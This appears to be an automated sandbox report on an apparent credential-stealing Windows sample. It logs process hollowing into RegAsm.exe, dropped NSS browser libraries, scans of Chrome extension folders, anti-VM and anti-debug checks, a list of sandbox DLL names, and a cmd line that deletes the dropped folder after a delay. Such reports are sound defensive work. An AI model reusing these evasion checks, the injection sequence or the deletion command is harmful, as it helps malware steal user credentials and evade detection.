                      Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: IIEBAF.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exit
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                      Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, wbemcomn.dll, amsi.dll, userenv.dll, version.dll, uxtheme.dll, sxs.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll, windowscodecs.dll, propsys.dll, windows.fileexplorer.common.dll, ntshrui.dll, windows.staterepositoryps.dll, onecoreuapcommonproxystub.dll, linkinfo.dll, dlnashext.dll, wpdshext.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, pcacli.dll
                      Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: file.exe Static file information: File size 1153024 > 1048576
                      Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb source: file.exe
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb% source: file.exe
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004177AB GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004177AB
                      Source: file.exeStatic PE information: section name: .00cfg
                      Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                      Source: sqlx[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006322E8 push ecx; ret 0_2_00678923
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419335 push ecx; ret 2_2_00419348
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\BGDAAKJJDAAK\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR
                      Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                      Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                      Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\BGDAAKJJDAAK\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\BGDAAKJJDAAK\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\BGDAAKJJDAAK\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 9.7 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.0 %
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 7760Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FD2C GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FE3Fh2_2_0040FD2C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CF963 FindFirstFileExW,0_2_006CF963
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CFE47 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006CFE47
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004163B3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004163B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004154FA _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004154FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B4B6 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B4B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409538 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6CD _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C6CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415BC6 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415BC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409FC5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409953 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A9D4 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A9D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415F6A _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415F6A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415947 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415947
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FEC8 GetSystemInfo,wsprintfA,2_2_0040FEC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RegAsm.exe, 00000002.00000002.2171551274.0000000003525000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2171023727.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-81940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006785BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006785BC
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D23FF mov eax, dword ptr fs:[00000030h]0_2_006D23FF
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2452 mov eax, dword ptr fs:[00000030h]0_2_006D2452
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D24A5 mov eax, dword ptr fs:[00000030h]0_2_006D24A5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2516 mov eax, dword ptr fs:[00000030h]0_2_006D2516
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D265E mov eax, dword ptr fs:[00000030h]0_2_006D265E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2609 mov eax, dword ptr fs:[00000030h]0_2_006D2609
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D26F0 mov eax, dword ptr fs:[00000030h]0_2_006D26F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D26B3 mov eax, dword ptr fs:[00000030h]0_2_006D26B3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BED17 mov ecx, dword ptr fs:[00000030h]0_2_006BED17
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401000 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,2_2_00401000
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067807F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0067807F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689365 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00689365
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004194DF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004194DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E598 SetUnhandledExceptionFilter,2_2_0041E598
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041AA07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041AA07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C9DAC62

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00F1018D
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111A4 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111A4
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AE1008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA24760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CA24760
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C901C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6C901C30
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00677D17 cpuid 0_2_00677D17
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_006C4389
                      Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_006D4E77
